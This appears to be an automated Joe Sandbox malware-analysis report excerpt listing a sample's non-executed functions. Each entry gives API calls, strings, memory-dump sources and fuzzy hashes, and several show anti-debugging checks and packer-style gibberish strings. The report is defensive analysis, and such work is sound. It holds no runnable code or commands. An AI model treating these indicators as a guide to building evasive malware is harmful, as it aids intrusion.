Opcode Fuzzy Hash: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
Instruction Fuzzy Hash: 63113C79A40208EFDB01DF98C985E99BBF5AF08351F0580A4F9489B361D371EA90DF80

Non-executed Functions

Function 00401006 Relevance: 7.6, APIs: 5, Instructions: 58COMMONLIBRARYCODE

Download Yara Rule

APIs

IsDebuggerPresent.KERNEL32 ref: 0040153A
SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 0040154F
UnhandledExceptionFilter.KERNEL32(004A81D8), ref: 0040155A
GetCurrentProcess.KERNEL32(C0000409), ref: 00401576
TerminateProcess.KERNEL32(00000000), ref: 0040157D

Memory Dump Source

Source File: 00000003.00000002.1880576861.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.1880473483.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1880576861.0000000000416000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1881667443.00000000004A8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1881816736.00000000004AB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1881905348.00000000004BE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_file.jbxd

Similarity

API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
String ID:
API String ID: 2579439406-0
Opcode ID: 0fb3fb5e7bf259ab6448a8a9e7ebaa3bce846b203ec3679ccc848abcde4aeca9
Instruction ID: 0b3bea1400b40ad5e48ba6736f07bea93129c4e83448c5e6560f8a7e7b25d377
Opcode Fuzzy Hash: 0fb3fb5e7bf259ab6448a8a9e7ebaa3bce846b203ec3679ccc848abcde4aeca9
Instruction Fuzzy Hash: FD21DDB9804200DFD781EF28EC896493FE1FB5A306F50403EE509972B1EBB899848F4D

Function 00401DF1 Relevance: 28.4, APIs: 12, Strings: 4, Instructions: 396COMMON

Download Yara Rule

APIs

_strlen.LIBCMT ref: 00401DDC
__decode_pointer.LIBCMT ref: 00401F5F
__decode_pointer.LIBCMT ref: 00401F8E
__decode_pointer.LIBCMT ref: 00401FB3
__aulldvrm.LIBCMT ref: 0040211A
_write_multi_char.LIBCMT ref: 0040222E
_write_string.LIBCMT ref: 0040224E
_write_multi_char.LIBCMT ref: 00402270
__cftof.LIBCMT ref: 004022B0
_write_string.LIBCMT ref: 004022D3
_write_multi_char.LIBCMT ref: 0040231C

Strings

, xrefs: 00401E52
@, xrefs: 00401E7E
-, xrefs: 004021D9
g, xrefs: 00401F98

Memory Dump Source

Source File: 00000003.00000002.1880576861.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.1880473483.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1880576861.0000000000416000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1881667443.00000000004A8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1881816736.00000000004AB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1881905348.00000000004BE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_file.jbxd

Similarity

API ID: __decode_pointer_write_multi_char$_write_string$__aulldvrm__cftof_strlen
String ID: $-$@$g
API String ID: 629750176-2320099971
Opcode ID: 095b86110f62afe62ee8aeefad637a127057675e2d76af2da50f9e5d4e3389cc
Instruction ID: 6ba02f3cd637ff9e87c9cb4f736c74e885d756f073139124003349791a170c4c
Opcode Fuzzy Hash: 095b86110f62afe62ee8aeefad637a127057675e2d76af2da50f9e5d4e3389cc
Instruction Fuzzy Hash: DFF18B7190422D8ADF349A64CD8C7AAB7B4AB14318F1402EBD908B62E1C7BC5EC5CF49

Function 00401FF4 Relevance: 28.4, APIs: 12, Strings: 4, Instructions: 354COMMON

Download Yara Rule

APIs

_strlen.LIBCMT ref: 00401DDC
__decode_pointer.LIBCMT ref: 00401F5F
__decode_pointer.LIBCMT ref: 00401F8E
__decode_pointer.LIBCMT ref: 00401FB3
__aulldvrm.LIBCMT ref: 0040211A
_write_multi_char.LIBCMT ref: 0040222E
_write_string.LIBCMT ref: 0040224E
_write_multi_char.LIBCMT ref: 00402270
__cftof.LIBCMT ref: 004022B0
_write_string.LIBCMT ref: 004022D3
_write_multi_char.LIBCMT ref: 0040231C

Strings

', xrefs: 00402005
-, xrefs: 004021D9
@, xrefs: 00401C3C
g, xrefs: 00401F98

Memory Dump Source

Source File: 00000003.00000002.1880576861.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.1880473483.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1880576861.0000000000416000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1881667443.00000000004A8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1881816736.00000000004AB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1881905348.00000000004BE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_file.jbxd

Similarity

API ID: __decode_pointer_write_multi_char$_write_string$__aulldvrm__cftof_strlen
String ID: '$-$@$g
API String ID: 629750176-1341051917
Opcode ID: a8d063c7bea4694a42b0598f3217cd777eb3dfee8eaea566d515b37e24a5fe7c
Instruction ID: 6e2cdd8e9a595e491f7ab82d7812ba42354a33e983998a8c0f01f17afa3f5d1a
Opcode Fuzzy Hash: a8d063c7bea4694a42b0598f3217cd777eb3dfee8eaea566d515b37e24a5fe7c
Instruction Fuzzy Hash: A5E17A7190422D9ADF358A64CD8C7EABBB5AB14314F1402EBD508B62E1CBB85FC5CF49

Function 00402191 Relevance: 24.8, APIs: 11, Strings: 3, Instructions: 288COMMON

Download Yara Rule

APIs

_write_multi_char.LIBCMT ref: 0040222E
_write_string.LIBCMT ref: 0040224E
_write_multi_char.LIBCMT ref: 00402270
__cftof.LIBCMT ref: 004022B0
_write_string.LIBCMT ref: 004022D3
_write_multi_char.LIBCMT ref: 0040231C

Strings

-, xrefs: 004021D9
@, xrefs: 00401C3C
g, xrefs: 00401F98

Memory Dump Source

Source File: 00000003.00000002.1880576861.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.1880473483.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1880576861.0000000000416000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1881667443.00000000004A8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1881816736.00000000004AB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1881905348.00000000004BE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_file.jbxd

Similarity

API ID: _write_multi_char$_write_string$__cftof
String ID: -$@$g
API String ID: 3900997005-2189933660
Opcode ID: 86cdf7e528832d705806c0ab37857f0f317a3912bb5b609c4eb3acbe7be5ac51
Instruction ID: 2d791c561945433e32149f911bfe946a9588dcc2bca4875a51dc65b82c03c0d9
Opcode Fuzzy Hash: 86cdf7e528832d705806c0ab37857f0f317a3912bb5b609c4eb3acbe7be5ac51
Instruction Fuzzy Hash: CBC1687180522D9ADF359A64CD8C7EABBB4AB14314F1001EBD808B62E1CBB85FC5CF49

Function 004021AA Relevance: 24.8, APIs: 11, Strings: 3, Instructions: 285COMMON

Download Yara Rule

APIs

_write_multi_char.LIBCMT ref: 0040222E
_write_string.LIBCMT ref: 0040224E
_write_multi_char.LIBCMT ref: 00402270
__cftof.LIBCMT ref: 004022B0
_write_string.LIBCMT ref: 004022D3
_write_multi_char.LIBCMT ref: 0040231C

Strings

-, xrefs: 004021D9
@, xrefs: 00401C3C
g, xrefs: 00401F98

Memory Dump Source

Source File: 00000003.00000002.1880576861.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.1880473483.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1880576861.0000000000416000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1881667443.00000000004A8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1881816736.00000000004AB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1881905348.00000000004BE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_file.jbxd

Similarity

API ID: _write_multi_char$_write_string$__cftof
String ID: -$@$g
API String ID: 3900997005-2189933660
Opcode ID: 4d02b72d50c9f9bb1d59fce803be6ecd55bd1512cc6d0135707bc7223e04f134
Instruction ID: b98fa686e20cc06dfa8a849242217f3b7f688326131eda51fcf34a02959cebd9
Opcode Fuzzy Hash: 4d02b72d50c9f9bb1d59fce803be6ecd55bd1512cc6d0135707bc7223e04f134
Instruction Fuzzy Hash: 2FC1687180522D9ADF359A64CD8C7EABBB8AB14314F1401EBD408B62E1CBB95FC5CF49

Function 02316437 Relevance: 18.1, APIs: 12, Instructions: 84COMMON

Download Yara Rule

APIs

__calloc_crt.LIBCMT ref: 0231644E

Part of subcall function 02319636: __calloc_impl.LIBCMT ref: 02319645

__calloc_crt.LIBCMT ref: 02316472
_free.LIBCMT ref: 02316480
__calloc_crt.LIBCMT ref: 0231648E
_free.LIBCMT ref: 0231649E
_free.LIBCMT ref: 023164A4
__copytlocinfo_nolock.LIBCMT ref: 023164B3
__setmbcp_nolock.LIBCMT ref: 023164D4
_free.LIBCMT ref: 023164E2
___removelocaleref.LIBCMT ref: 023164E9
___freetlocinfo.LIBCMT ref: 023164F0
_free.LIBCMT ref: 023164F6

Memory Dump Source

Source File: 00000003.00000002.1883209457.00000000022F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_22f0000_file.jbxd

Yara matches

Similarity

API ID: _free$__calloc_crt$___freetlocinfo___removelocaleref__calloc_impl__copytlocinfo_nolock__setmbcp_nolock
String ID:
API String ID: 1442030790-0
Opcode ID: 6bd5cc8f3dd8ebf785cdc17837931ce977b5cf0fd4524e89a9393df48daa8713
Instruction ID: 4463f19b43992791dad31734b73ee597d19339c31023951a20a3667ab2b3bee2
Opcode Fuzzy Hash: 6bd5cc8f3dd8ebf785cdc17837931ce977b5cf0fd4524e89a9393df48daa8713
Instruction Fuzzy Hash: A921D231204601AEEB3D7FA5DC03E5F7BEEDF81760B508029E589554A4EF628950CF60

Function 02313F16 Relevance: 16.8, APIs: 11, Instructions: 258COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 02313F51

Part of subcall function 02315BA8: __getptd_noexit.LIBCMT ref: 02315BA8

__gmtime64_s.LIBCMT ref: 02313FEA
__gmtime64_s.LIBCMT ref: 02314020
__gmtime64_s.LIBCMT ref: 0231403D
__allrem.LIBCMT ref: 02314093
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 023140AF
__allrem.LIBCMT ref: 023140C6
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 023140E4
__allrem.LIBCMT ref: 023140FB
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 02314119
__invoke_watson.LIBCMT ref: 0231418A

Memory Dump Source

Source File: 00000003.00000002.1883209457.00000000022F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_22f0000_file.jbxd

Yara matches

Similarity

API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@__gmtime64_s$__getptd_noexit__invoke_watson_memset
String ID:
API String ID: 384356119-0
Opcode ID: 7fd9d583014fb9bd54c3649c392eeadef0098b2c5eee71df52b0c12f16343c62
Instruction ID: 087b2bebdc2557dfc11b9d227fc87e3786120b2ced0b6428da1b5f66d3417910
Opcode Fuzzy Hash: 7fd9d583014fb9bd54c3649c392eeadef0098b2c5eee71df52b0c12f16343c62
Instruction Fuzzy Hash: 93710871A00B27ABE72C9F79CC41B6AB3B9AF10774F14427AE614E7680E770D9458BD0

Function 0231650E Relevance: 16.6, APIs: 11, Instructions: 131COMMONLIBRARYCODE

Download Yara Rule

APIs

__invoke_watson.LIBCMT ref: 02316547
__calloc_crt.LIBCMT ref: 02316598
__lock.LIBCMT ref: 023165AE
__copytlocinfo_nolock.LIBCMT ref: 023165BF
_wcscmp.LIBCMT ref: 023165F9
__lock.LIBCMT ref: 02316610
__updatetlocinfoEx_nolock.LIBCMT ref: 02316622
___removelocaleref.LIBCMT ref: 02316628
__updatetlocinfoEx_nolock.LIBCMT ref: 02316647

Memory Dump Source

Source File: 00000003.00000002.1883209457.00000000022F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_22f0000_file.jbxd

Yara matches

Similarity

API ID: Ex_nolock__lock__updatetlocinfo$___removelocaleref__calloc_crt__copytlocinfo_nolock__invoke_watson_wcscmp
String ID:
API String ID: 3432600739-0
Opcode ID: 7aa5c98289f18997e9299cf2a82b2e33c44f00e8491ec962a9d4b764f8744340
Instruction ID: 8cc152f47b4ae09e9f0b2ff590267cff9b750f4505683926dbc31e6418e6dc7e
Opcode Fuzzy Hash: 7aa5c98289f18997e9299cf2a82b2e33c44f00e8491ec962a9d4b764f8744340
Instruction Fuzzy Hash: BD413732904304AFDB28EFE4DD82B9E7BFAEF48314F10842DEA1496190DB759644DF21

Function 023184AB Relevance: 16.6, APIs: 11, Instructions: 92COMMONLIBRARYCODE

Download Yara Rule

APIs

___crtCorExitProcess.LIBCMT ref: 023184B1
_free.LIBCMT ref: 023184E2
_free.LIBCMT ref: 023184F5
_free.LIBCMT ref: 02318513
_free.LIBCMT ref: 02318525
_free.LIBCMT ref: 02318536
_free.LIBCMT ref: 02318541
_free.LIBCMT ref: 02318565
_free.LIBCMT ref: 02318581
_free.LIBCMT ref: 02318597
_free.LIBCMT ref: 023185BF

Memory Dump Source

Source File: 00000003.00000002.1883209457.00000000022F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_22f0000_file.jbxd

Yara matches

Similarity

API ID: _free$ExitProcess___crt
String ID:
API String ID: 1022109855-0
Opcode ID: 351ddd14b24f1e3a4d385d89d907221036510e379468225c84414e37ce72688f
Instruction ID: 276a0de6bdf9a66a4f1fd82e9b55f5f6f0120e6987e27b313804ff2478f2a563
Opcode Fuzzy Hash: 351ddd14b24f1e3a4d385d89d907221036510e379468225c84414e37ce72688f
Instruction Fuzzy Hash: A531D231900254DFEF29AF15FC8088D77A6FB14324714862AEA48572B0CFF469C9EF98

Function 0233FC0C Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 58COMMON

Download Yara Rule

APIs

std::exception::exception.LIBCMT ref: 0233FC1F

Part of subcall function 0232169C: std::exception::_Copy_str.LIBCMT ref: 023216B5

__CxxThrowException@8.LIBCMT ref: 0233FC34
std::exception::exception.LIBCMT ref: 0233FC4D
__CxxThrowException@8.LIBCMT ref: 0233FC62
std::regex_error::regex_error.LIBCPMT ref: 0233FC74

Part of subcall function 0233F914: std::exception::exception.LIBCMT ref: 0233F92E

__CxxThrowException@8.LIBCMT ref: 0233FC82
std::exception::exception.LIBCMT ref: 0233FC9B
__CxxThrowException@8.LIBCMT ref: 0233FCB0

Strings

leM, xrefs: 0233FCA8

Memory Dump Source

Source File: 00000003.00000002.1883209457.00000000022F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_22f0000_file.jbxd

Yara matches

Similarity

API ID: Exception@8Throwstd::exception::exception$Copy_strstd::exception::_std::regex_error::regex_error
String ID: leM
API String ID: 3569886845-2926266777
Opcode ID: ed214ebb3701571be2f43069d920533da395f334550e3d3fd8b3428f3c6f404b
Instruction ID: 301fc74c1e5dd13ed05acd3770909217fd8efc3604fc464587fd36b5f5c36a20
Opcode Fuzzy Hash: ed214ebb3701571be2f43069d920533da395f334550e3d3fd8b3428f3c6f404b
Instruction Fuzzy Hash: 5311C879C0020DBBCF00FFA5D995CEEBBBDAA04344F408566AD5897641EB74A34C8F94

Function 022FF010 Relevance: 15.1, APIs: 10, Instructions: 78COMMON

Download Yara Rule

APIs

_malloc.LIBCMT ref: 022FF01F

Part of subcall function 02311602: __FF_MSGBANNER.LIBCMT ref: 02311619
Part of subcall function 02311602: __NMSG_WRITE.LIBCMT ref: 02311620

_malloc.LIBCMT ref: 022FF02B
_wprintf.LIBCMT ref: 022FF03E
_free.LIBCMT ref: 022FF044
_free.LIBCMT ref: 022FF065
_malloc.LIBCMT ref: 022FF06D
_sprintf.LIBCMT ref: 022FF0C0
_wprintf.LIBCMT ref: 022FF0D2
_wprintf.LIBCMT ref: 022FF0DC
_free.LIBCMT ref: 022FF0E5

Memory Dump Source

Source File: 00000003.00000002.1883209457.00000000022F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_22f0000_file.jbxd

Yara matches

Similarity

API ID: _free_malloc_wprintf$_sprintf
String ID:
API String ID: 3721157643-0
Opcode ID: 02ca39b803bb7accc6b95a63f2f9baed07ed6e7a95ba34453850edf5138b640f
Instruction ID: 44dc6fb7a3bd1c5f5fe786dc6857eff26dd6f11c6e6e54b866115a28beabf4ca
Opcode Fuzzy Hash: 02ca39b803bb7accc6b95a63f2f9baed07ed6e7a95ba34453850edf5138b640f
Instruction Fuzzy Hash: 331103B29106647AC271A6F55C11FFF7BED9F46702F0800A9FF8CD1180EB595A049BB1

Function 02301960 Relevance: 13.6, APIs: 9, Instructions: 149COMMON

Download Yara Rule

APIs

__CxxThrowException@8.LIBCMT ref: 023019C6
__CxxThrowException@8.LIBCMT ref: 023019F1
__CxxThrowException@8.LIBCMT ref: 02301A1A
__CxxThrowException@8.LIBCMT ref: 02301A4B
_memset.LIBCMT ref: 02301A6A
__CxxThrowException@8.LIBCMT ref: 02301A90
_malloc.LIBCMT ref: 02301AA0
_memset.LIBCMT ref: 02301AAB
_sprintf.LIBCMT ref: 02301ACE

Memory Dump Source

Source File: 00000003.00000002.1883209457.00000000022F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_22f0000_file.jbxd

Yara matches

Similarity

API ID: Exception@8Throw$_memset$_malloc_sprintf
String ID:
API String ID: 65388428-0
Opcode ID: 76dd775f958ae6873f0575faef2ecf56324248e316e82f6433bbffcf9f7903c6
Instruction ID: 2facc6e147557cf24a4d7d1f8a5d0790711c9238441cf0818af4c2032633aaa2
Opcode Fuzzy Hash: 76dd775f958ae6873f0575faef2ecf56324248e316e82f6433bbffcf9f7903c6
Instruction Fuzzy Hash: 55516D71D40219ABDB21DBA5DD86FEFBBB9FF04704F100025F949F6180EB746A058BA5

Function 004A76C9 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 64sleepCOMMON

Download Yara Rule

APIs

GetNumaHighestNodeNumber.KERNEL32(00000000), ref: 004A76F9
GetNumaHighestNodeNumber.KERNEL32(00000000), ref: 004A7737
SetCalendarInfoA.KERNEL32(00000000,00000000,00000000,00000000), ref: 004A773D
OpenJobObjectW.KERNEL32(00000000,00000000,00000000), ref: 004A7746
GetShortPathNameA.KERNEL32(00000000,?,00000000), ref: 004A7755
Sleep.KERNEL32(00000000), ref: 004A775C

Strings

-, xrefs: 004A7771

Memory Dump Source

Source File: 00000003.00000002.1880576861.0000000000416000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.1880473483.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1880576861.0000000000401000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1881667443.00000000004A8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1881816736.00000000004AB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1881905348.00000000004BE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_file.jbxd

Similarity

API ID: HighestNodeNumaNumber$CalendarInfoNameObjectOpenPathShortSleep
String ID: -
API String ID: 2970987874-2547889144
Opcode ID: 9b33d46c0403a50369798fe00ff57a8df1f0e7e6d27645e2e6df78d4bee4b6d8
Instruction ID: eab8635ab0fcaf2fc8953894b32ace80609d3d51a4a9cbe2f64154a44f6f28a4
Opcode Fuzzy Hash: 9b33d46c0403a50369798fe00ff57a8df1f0e7e6d27645e2e6df78d4bee4b6d8
Instruction Fuzzy Hash: DF2196B5804158EBCB219F25DC849AF7BB8EF86714F0181ADE619A7141CB385DC6CF6C

Function 022FF210 Relevance: 10.7, APIs: 7, Instructions: 165COMMON

Download Yara Rule

APIs

__CxxThrowException@8.LIBCMT ref: 022FF284
__CxxThrowException@8.LIBCMT ref: 022FF2AF
__CxxThrowException@8.LIBCMT ref: 022FF2DE
__CxxThrowException@8.LIBCMT ref: 022FF30F
_memset.LIBCMT ref: 022FF32E
__CxxThrowException@8.LIBCMT ref: 022FF354
_sprintf.LIBCMT ref: 022FF373

Memory Dump Source

Source File: 00000003.00000002.1883209457.00000000022F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_22f0000_file.jbxd

Yara matches

Similarity

API ID: Exception@8Throw$_memset_sprintf
String ID:
API String ID: 217217746-0
Opcode ID: 3deed8c6e3840860115ea43936f1cfce13c92bcc70370307f91e5f5c9cd17acd
Instruction ID: 76583b2e27606b58d1fea02b42070e3873940266861569bbd5c4d703eb3d4d7c
Opcode Fuzzy Hash: 3deed8c6e3840860115ea43936f1cfce13c92bcc70370307f91e5f5c9cd17acd
Instruction Fuzzy Hash: D8515FB1D50249AADF21DFE1DD86FEEBB79EB04704F100029FA05B61C0D7B5AA058FA5

Function 022FF440 Relevance: 10.7, APIs: 7, Instructions: 159COMMON

Download Yara Rule

APIs

__CxxThrowException@8.LIBCMT ref: 022FF4B7
__CxxThrowException@8.LIBCMT ref: 022FF4E2
__CxxThrowException@8.LIBCMT ref: 022FF504
__CxxThrowException@8.LIBCMT ref: 022FF535
_memset.LIBCMT ref: 022FF554
__CxxThrowException@8.LIBCMT ref: 022FF57A
_sprintf.LIBCMT ref: 022FF594

Memory Dump Source

Source File: 00000003.00000002.1883209457.00000000022F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_22f0000_file.jbxd

Yara matches

Similarity

API ID: Exception@8Throw$_memset_sprintf
String ID:
API String ID: 217217746-0
Opcode ID: 16aaa772ddb988d461e4337924cf716956fc1cb963719ed600faa1ffd715582e
Instruction ID: 9566c9fb456abc0271adc1b2daa97916e8e03bb9c00753473928fbc8d8fae9b1
Opcode Fuzzy Hash: 16aaa772ddb988d461e4337924cf716956fc1cb963719ed600faa1ffd715582e
Instruction Fuzzy Hash: BC514071D40249AADF21DFE1DD86FEFBBB9EB04704F100129FA05B61C0E774AA058BA4

Function 004A7796 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 49memoryCOMMON

Download Yara Rule

APIs

GetFullPathNameA.KERNEL32(vobarigawekowoxilinifur,00000000,?,00000000), ref: 004A77D0
FreeEnvironmentStringsW.KERNEL32(00000000), ref: 004A77EA
HeapCreate.KERNEL32(00000000,00000000,00000000), ref: 004A7808
SetFileShortNameA.KERNEL32(00000000,ximawazudikahefafopoporifozib kadamuzayecep hizujajugejusawaharidam wunoguzazapeguvecazageganuzi), ref: 004A7814

Strings

vobarigawekowoxilinifur, xrefs: 004A77CB
ximawazudikahefafopoporifozib kadamuzayecep hizujajugejusawaharidam wunoguzazapeguvecazageganuzi, xrefs: 004A780E

Memory Dump Source

Source File: 00000003.00000002.1880576861.0000000000416000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.1880473483.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1880576861.0000000000401000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1881667443.00000000004A8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1881816736.00000000004AB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1881905348.00000000004BE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_file.jbxd

Similarity

API ID: Name$CreateEnvironmentFileFreeFullHeapPathShortStrings
String ID: vobarigawekowoxilinifur$ximawazudikahefafopoporifozib kadamuzayecep hizujajugejusawaharidam wunoguzazapeguvecazageganuzi
API String ID: 4071102102-3876065148
Opcode ID: 8760816cc998bdfbdd5e39e83e3124332d60a725e50a4bdf52e1ef8e9766b2bc
Instruction ID: e7bf0dbb7ed17877254e05ca546f2dd8197638464256ca5c76e718710d91db8c
Opcode Fuzzy Hash: 8760816cc998bdfbdd5e39e83e3124332d60a725e50a4bdf52e1ef8e9766b2bc
Instruction Fuzzy Hash: 8D015E75508104ABD720AB79ED85D6F3BBCE7AB715B00013EF601D2152DA785845CA6D

Function 0233208B Relevance: 9.1, APIs: 6, Instructions: 112COMMON

Download Yara Rule

APIs

__getenv_helper_nolock.LIBCMT ref: 023320C6
__invoke_watson.LIBCMT ref: 02332120
_strlen.LIBCMT ref: 023320D4

Part of subcall function 02315BA8: __getptd_noexit.LIBCMT ref: 02315BA8

_strnlen.LIBCMT ref: 0233215F
__lock.LIBCMT ref: 02332170
__getenv_helper_nolock.LIBCMT ref: 0233217B

Memory Dump Source

Source File: 00000003.00000002.1883209457.00000000022F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_22f0000_file.jbxd

Yara matches

Similarity

API ID: __getenv_helper_nolock$__getptd_noexit__invoke_watson__lock_strlen_strnlen
String ID:
API String ID: 3534693527-0
Opcode ID: 7b5cd30b09028c4688c7add7ba7a2b705b2aa5fc65eb7c357d53e3922a347f5d
Instruction ID: 702fc956e582f17bc45256e0920f539d9de71185ec885072f8fc55206ad697bf
Opcode Fuzzy Hash: 7b5cd30b09028c4688c7add7ba7a2b705b2aa5fc65eb7c357d53e3922a347f5d
Instruction Fuzzy Hash: 74310672A00225ABDB376B64DC00B6F77AA9F45B24F104415ED04EB294DB78CE45CBE1

Function 00405D99 Relevance: 7.5, APIs: 5, Instructions: 47COMMONLIBRARYCODE

Download Yara Rule

APIs

__getptd.LIBCMT ref: 00405DA5

Part of subcall function 00404D73: __getptd_noexit.LIBCMT ref: 00404D76
Part of subcall function 00404D73: __amsg_exit.LIBCMT ref: 00404D83

__amsg_exit.LIBCMT ref: 00405DC5
__lock.LIBCMT ref: 00405DD5
InterlockedDecrement.KERNEL32(?), ref: 00405DF2
InterlockedIncrement.KERNEL32(022E2C90), ref: 00405E1D

Memory Dump Source

Source File: 00000003.00000002.1880576861.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.1880473483.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1880576861.0000000000416000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1881667443.00000000004A8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1881816736.00000000004AB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1881905348.00000000004BE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_file.jbxd

Similarity

API ID: Interlocked__amsg_exit$DecrementIncrement__getptd__getptd_noexit__lock
String ID:
API String ID: 4271482742-0
Opcode ID: 8c9547458fd7c424843e330023cdc540895f6a26820e5d3a19e3b59fdc0a9e85
Instruction ID: a786bc2395a33695c01f39912e35e9194cb072813b2b01bf5b096d5615f318c8
Opcode Fuzzy Hash: 8c9547458fd7c424843e330023cdc540895f6a26820e5d3a19e3b59fdc0a9e85
Instruction Fuzzy Hash: 9F018E31D01A1197C721AB25980A75F7A60FF01714F14443FE850B76D1CB3C6A828FDE

Function 004010AD Relevance: 7.5, APIs: 5, Instructions: 44memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

__lock.LIBCMT ref: 004010CB

Part of subcall function 00402742: __mtinitlocknum.LIBCMT ref: 00402758
Part of subcall function 00402742: __amsg_exit.LIBCMT ref: 00402764
Part of subcall function 00402742: EnterCriticalSection.KERNEL32(00402543,00402543,?,004034AD,00000004,004A95C8,0000000C,004065F7,0040102A,00402552,00000000,00000000,00000000,?,00404D25,00000001), ref: 0040276C

___sbh_find_block.LIBCMT ref: 004010D6
